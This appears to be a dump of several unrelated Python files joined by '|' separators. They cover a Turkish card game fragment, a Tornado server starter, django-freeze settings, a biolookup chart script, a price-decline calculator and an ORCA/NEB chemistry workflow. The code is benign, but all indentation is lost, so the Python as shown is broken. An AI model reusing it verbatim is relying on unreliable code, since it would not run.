print("\n\n\t\tKART ÇEK HATA VERDİ,\t adım: {},\n deste uzunluğu: {},\n ortanın uzunluğu: {},\n destedeki kartlar: {}\n\n".format(i,len(deck),len(orta.ortada),[k.name for k in deck]))
oyun_raporu += "\n\n\t\tKART ÇEK HATA VERDİ,\t adım: {},\n deste uzunluğu: {},\n ortanın uzunluğu: {},\n destedeki kartlar: {}\n".format(i,len(deck),len(orta.ortada),[k.name for k in deck])
print(hata)
oyun_raporu += "Hata: {}\n".format(hata)
def hamle_sec_user_ng(self):
global oyun_raporu
kontrol1 = 0
while kontrol1 < 1:
time.sleep(1)
print("\n\tElindeki kartlar:\n\t{}".format([k.name for k in self.oyuncu.cards]))
oyun_raporu += "\n\tElindeki kartlar:\n\t{}\n".format([k.name for k in self.oyuncu.cards])
cevap_hamle_sec = str(input("\n\tHangi kartı oynamak istersin?\n\tgeri dönmek istiyorsan <geri> yaz\n\t")).lower()
oyun_raporu += "\n\toynanmak istenen kart: {}\n".format(cevap_hamle_sec)
for card in self.hamleler:
if card.name == cevap_hamle_sec:
hamle = card
kontrol1 = 1
return hamle
if cevap_hamle_sec == "geri":
return 0
elif i < 4:
print("\n\tTur ilk kez sana geldi\n\tİlk turda 7'li, 10'lu, 'vale' veya 'as' oynayamazsın,\n\tve sadece 'sinek' oynayabilirsin")
time.sleep(2)
print("\n\tElinde uygun kart yoksa kart çek\n\t")
else:
print("\n\tOynayabileceğin bir kartı yazmadın")
oyun_raporu += "\n\tOynayabileceğin bir kartı yazmadın\n"
time.sleep(1)
cevap_info = str(input("\n\tKart oynama kurallarına gözatmak ister misin?\n\tKurallara bakmak için <e>, geçmek için <h> yaz\n\t")).lower()
cevap_info2 = cevap_info.lstrip("<")
cevap_info3 = cevap_info2.rstrip(">")
if cevap_info == "e":
print("Bir kartı oynayabilmen için şu 3 koşuldan en az birini sağlamassı lazım:\n\t_ kartın değeri, ortanın değeriyle aynı\n\t_ kartın şekli, ortanın şekliyle aynı\n\t_ vale (ortanın değeri ya da şeklinden bağımsız, her an oynanabilir\n\t)")
def hamle_sec_user_ng7(self,cards_7):
global oyun_raporu
kontrol1 = 0
while kontrol1 < 1:
time.sleep(1)
print("\n\tElindeki kartlar:\n\t{}".format([k.name for k in self.oyuncu.cards]))
oyun_raporu += "\n\tElindeki kartlar:\n\t{}\n".format([k.name for k in self.oyuncu.cards])
cevap_hamle_sec = str(input("\n\tHangi kartı oynamak istersin?\n\tgeri dönmek istiyorsan <geri> yaz\n\t")).lower()
oyun_raporu += "\n\toynanmak istenen kart: {}\n".format(cevap_hamle_sec)
for card in cards_7:
if card.name == cevap_hamle_sec:
hamle = card
kontrol1 = 1
return hamle
if cevap_hamle_sec == "geri":
return 0
else:
print("\n\tOynayabileceğin bir kartı yazmadın")
oyun_raporu += "\n\tOynayabileceğin bir kartı yazmadın\n"
time.sleep(1)
print("\n\tEn son {} oynandı".format(orta.ortadaki_kart.name))
oyun_raporu += "\n\tEn son {} oynandı\n".format(orta.ortadaki_kart.name)
time.sleep(1)
print("\n\tEğer elinde 7'li varsa, onu oynayabilirsin")
oyun_raporu += "\n\tEğer elinde 7'li varsa, onu oynayabilirsin\n"
time.sleep(1)
print("\n\tYoksa, kart çekmek zorundasın")
oyun_raporu += "\n\tYoksa, kart çekmek zorundasın"
time.sleep(1)
def kart_oyna_user_ng(self,card_instance):
global oyun_raporu
if card_instance.value == "vale":
time.sleep(1)
cevap_vale = str(input("\n\tOrta ne olsun istersin?\n\t<kupa/karo/maça/sinek>\n\t")).lower()
global secim
secim = cevap_vale
global orta
orta = Orta(card_instance)
window.gui_kartoyna_np(card_instance)
self.oyuncu.cards.remove(card_instance)
window.gui_el_goster(self.oyuncu)
time.sleep(1)
print("\n\t{} oynadın".format(card_instance.name))
oyun_raporu += "\n\t{} oynadın\n".format(card_instance.name)
time.sleep(1)
oyun_raporu += "\n\tElindekiler\n\t{}\n".format([k.name for k in self.oyuncu.cards])
oyun_raporu += "\nortadaki kart sayısı: {}\n".format(len(orta.ortada))
if card_instance.value == "vale":
print("valeden dolayı değişen orta: {}".format(secim))
oyun_raporu += "valeden dolayı değişen orta: {}\n".format(secim)
time.sleep(1)
|
from string import ascii_uppercase
from random import choice
def check():
return 1
def make_grid(width, height):
return {(row, col): choice(ascii_uppercase)
for row in range(height)
for col in range(width)}
|
import os
import logging
import tornado.ioloop
import tornado.web
import tornado.log
log = logging.getLogger('dorthy.server')
def listen(routes, port=None):
if not port:
try:
port = os.environ['PORT']
except:
port = 8899
app = tornado.web.Application(routes.routes)
log.info('Starting tornado server on 127.0.0.1:%s' % port)
app.listen(port)
tornado.ioloop.IOLoop.instance().start()
|
# -*- coding: utf-8 -*-
"""Generate charts for the summary section of the biolookup service."""
import pathlib
import bioregistry
import matplotlib.pyplot as plt
from matplotlib_venn import venn2
from biolookup import backends
HERE = pathlib.Path(__file__).parent.resolve()
STATIC = HERE.joinpath("static")
def main():
"""Generate charts for the biolookup app."""
# 1
backend = backends.get_backend(sql=True)
biolookup_prefixes = set(backend.summarize_names())
bioregistry_prefixes = set(bioregistry.read_registry())
fig, ax = plt.subplots()
venn2([biolookup_prefixes, bioregistry_prefixes], ["Biolookup", "Bioregistry"], ax=ax)
fig.savefig(STATIC.joinpath("coverage.svg"))
plt.close(fig)
if __name__ == "__main__":
main()
|
'''
Created on Oct 11, 2015
@author: Zhongyi Yan
'''
import math
import os
def CalPrice( p, a, b, c, d, k ):
priceArray = []
for i in range(1, k+1):
tmp1 = math.sin( a * i + b )
tmp2 = math.cos( c * i + d )
priceArray.append(p * ( tmp1 + tmp2 + 2 ))
#print("Scheibe!")
return priceArray
def MaxDec( p ):
maxDec = 0
maxVal = 0
for i in range( len(p) ):
maxDec = max( maxDec, maxVal - p[i] )
maxVal = max( maxVal, p[i] )
return maxDec
if os.path.exists('input.dat'):
fileIn = open( 'input.dat' , 'r' )
fileOut = open( 'output.dat', 'w+' )
for line in fileIn:
constantP,constantA,constantB,constantC,constantD,valK = map(int, line.split(' '))
done = True
if constantP < 1 or constantP > 1000:
done = False
if constantA < 0 or constantA > 1000:
done = False
if constantB < 0 or constantB > 1000:
done = False
if constantC < 0 or constantC > 1000:
done = False
if constantD < 0 or constantD > 1000:
done = False
if valK < 1 or valK > 1000000:
done = False
if not done:
print("invalid constant or variable")
price = CalPrice( constantP, constantA, constantB, constantC, constantD, valK )
fileOut.write('The largest decline is {0:.6f} \n ' .format(MaxDec(price)))
#print('The largest decline is {0:.6f} ' .format(MaxDec(price)))
else:
print("input file dosen't exist")
# done = False
# while not done:
# print('Enter constants p, which between 1 to 1,000')
# constantP = int( input() )
# if constantP >= 1 and constantP <= 1000:
# done = True
# done = False
# while not done:
# print('Enter constants a, which between 0 to 1,000')
# constantA = int( input() )
# if constantA >= 0 and constantA <= 1000:
# done = True
# done = False
# while not done:
# print('Enter constants b, which between 0 to 1,000')
# constantB = int( input() )
# if constantB >= 0 and constantB <= 1000:
# done = True
# done = False
# while not done:
# print('Enter constants c, which between 0 to 1,000')
# constantC = int( input() )
# if constantC >= 0 and constantC <= 1000:
# done = True
# done = False
# while not done:
# print('Enter constants d, which between 0 to 1,000')
# constantD = int( input() )
# if constantD >= 0 and constantD <= 1000:
# done = True
# done = False
# while not done:
# print('Enter constants k, which between 1 to 1,000,000')
# valK = int( input() )
# if valK >= 1 and valK <= 1000000:
# done = True
# done = False
# price = CalPrice( constantP, constantA, constantB, constantC, constantD, valK )
# print('The largest decline is {0:.6f} ' .format(MaxDec(price)))
#print( price )
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.exceptions import ImproperlyConfigured
import os
FREEZE_ROOT = getattr(settings, 'FREEZE_ROOT', os.path.abspath(os.path.join(settings.MEDIA_ROOT, '../freeze/')) )
if not os.path.isabs(FREEZE_ROOT):
raise ImproperlyConfigured('settings.FREEZE_ROOT should be an absolute path')
if settings.MEDIA_ROOT.find(FREEZE_ROOT) == 0 or settings.STATIC_ROOT.find(FREEZE_ROOT) == 0:
raise ImproperlyConfigured('settings.FREEZE_ROOT cannot be a subdirectory of MEDIA_ROOT or STATIC_ROOT')
FREEZE_MEDIA_ROOT = settings.MEDIA_ROOT
FREEZE_MEDIA_URL = settings.MEDIA_URL
FREEZE_STATIC_ROOT = settings.STATIC_ROOT
FREEZE_STATIC_URL = settings.STATIC_URL
FREEZE_USE_HTTPS = getattr(settings, 'FREEZE_USE_HTTPS', False)
FREEZE_PROTOCOL = 'https://' if FREEZE_USE_HTTPS else 'http://'
FREEZE_SITE_URL = getattr(settings, 'FREEZE_SITE_URL', None)
if(FREEZE_SITE_URL == None):
# handled this way to remove DB dependency unless strictly needed. If FREEZE_SITE_URL is set then collectstatic
# can be called without needing a db setup, which is useful for build servers
FREEZE_SITE_URL = '%s%s' % (FREEZE_PROTOCOL, Site.objects.get_current().domain,)
FREEZE_BASE_URL = getattr(settings, 'FREEZE_BASE_URL', None)
if FREEZE_BASE_URL:
if FREEZE_BASE_URL.startswith('/') or FREEZE_BASE_URL.startswith('http'):
if not FREEZE_BASE_URL.endswith('/'):
FREEZE_BASE_URL += '/'
else:
raise ImproperlyConfigured('settings.FREEZE_BASE_URL should start with \'/\' or \'http\' or be an empty string')
FREEZE_RELATIVE_URLS = getattr(settings, 'FREEZE_RELATIVE_URLS', False)
if FREEZE_RELATIVE_URLS and FREEZE_BASE_URL != None:
raise ImproperlyConfigured('settings.FREEZE_RELATIVE_URLS cannot be set to True if FREEZE_BASE_URL is specified')
FREEZE_LOCAL_URLS = getattr(settings, 'FREEZE_LOCAL_URLS', False)
if FREEZE_LOCAL_URLS and not FREEZE_RELATIVE_URLS:
raise ImproperlyConfigured('settings.FREEZE_LOCAL_URLS cannot be set to True if FREEZE_RELATIVE_URLS is set to False')
FREEZE_FOLLOW_SITEMAP_URLS = getattr(settings, 'FREEZE_FOLLOW_SITEMAP_URLS', True)
FREEZE_FOLLOW_HTML_URLS = getattr(settings, 'FREEZE_FOLLOW_HTML_URLS', True)
FREEZE_REPORT_INVALID_URLS = getattr(settings, 'FREEZE_REPORT_INVALID_URLS', False)
FREEZE_REPORT_INVALID_URLS_SUBJECT = getattr(settings, 'FREEZE_REPORT_INVALID_URLS_SUBJECT', '[freeze] invalid urls')
FREEZE_INCLUDE_MEDIA = getattr(settings, 'FREEZE_INCLUDE_MEDIA', True)
FREEZE_INCLUDE_STATIC = getattr(settings, 'FREEZE_INCLUDE_STATIC', True)
FREEZE_ZIP_ALL = getattr(settings, 'FREEZE_ZIP_ALL', False)
FREEZE_ZIP_NAME = getattr(settings, 'FREEZE_ZIP_NAME', 'freeze')
if len(FREEZE_ZIP_NAME) >= 4 and FREEZE_ZIP_NAME[-4:].lower() != '.zip':
FREEZE_ZIP_NAME += '.zip'
FREEZE_ZIP_PATH = os.path.abspath(os.path.join(FREEZE_ROOT, FREEZE_ZIP_NAME))
FREEZE_REQUEST_HEADERS = getattr(settings, 'FREEZE_REQUEST_HEADERS', {'user-agent': 'django-freeze'})
|
from gym.envs.classic_control import rendering
import pyglet
class Text(rendering.Geom):
def __init__(self, text, size=14):
rendering.Geom.__init__(self)
self.size = size
self.set_text(text)
def set_text(self, text):
self.text = pyglet.text.Label(text, 'sans-serif', self.size)
def render1(self):
self.text.draw() |
from squid import orca
from squid import files
from squid import geometry
from squid.calcs import NEB
from squid import structures
if __name__ == "__main__":
# In this example we will generate the full CNH-HCN isomerization using
# only squid. Then we optimize the endpoints in DFT, smooth the frames,
# and subsequently run NEB
# Step 1 - Generate the bad initial guess
print("Step 1 - Generate the bad initial guess...")
H_coords = [(2, 0), (2, 0.5), (1, 1), (0, 1), (-1, 0.5), (-1, 0)]
CNH_frames = [[
structures.Atom("C", 0, 0, 0),
structures.Atom("N", 1, 0, 0),
structures.Atom("H", x, y, 0)]
for x, y in H_coords
]
# Save initial frames
files.write_xyz(CNH_frames, "bad_guess.xyz")
# Step 2 - Optimize the endpoints
print("Step 2 - Optimize endpoints...")
frame_start_job = orca.job(
"frame_start", "! HF-3c Opt", atoms=CNH_frames[0], queue=None
)
frame_last_job = orca.job(
"frame_last", "! HF-3c Opt", atoms=CNH_frames[-1], queue=None
)
# Wait
frame_start_job.wait()
frame_last_job.wait()
# Step 3 - Read in the final coordiantes, and update the band
print("Step 3 - Store better endpoints...")
CNH_frames[0] = orca.read("frame_start").atoms
CNH_frames[-1] = orca.read("frame_last").atoms
# Save better endpoints
files.write_xyz(CNH_frames, "better_guess.xyz")
# Step 4 - Smooth out the band to 10 frames
print("Step 4 - Smooth out the band...")
CNH_frames = geometry.smooth_xyz(
CNH_frames, N_frames=8,
use_procrustes=True
)
# Save smoothed band
files.write_xyz(CNH_frames, "smoothed_guess.xyz")
# Step 5 - Run NEB
print("Step 5 - Run NEB...")
neb_handle = NEB(
"CNH", CNH_frames, "! HF-3c",
nprocs=1, queue=None, ci_neb=True)
CNH_frames = neb_handle.optimize()[-1]
# Save final band
files.write_xyz(CNH_frames, "final.xyz")
# Step 6 - Isolate the peak frame, and converge to the transition state
print("Step 6 - Calculating Transition State...")
ts_job = orca.job(
"CNH_TS", "! HF-3c OptTS NumFreq",
extra_section='''
%geom
Calc_Hess true
NumHess true
Recalc_Hess 5
end
''',
atoms=CNH_frames[neb_handle.highest_energy_frame_index], queue=None
)
ts_job.wait()
# Ensure we did find the transition state
data = orca.read("CNH_TS")
vib_freq = data.vibfreq
if sum([int(v < 0) for v in vib_freq]) == 1:
print(" Isolated a transition state with exactly 1 negative vibfreq.")
print(" Saving it to CNH_ts.xyz")
files.write_xyz(data.atoms, "CNH_ts.xyz")
else:
print("FAILED!")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.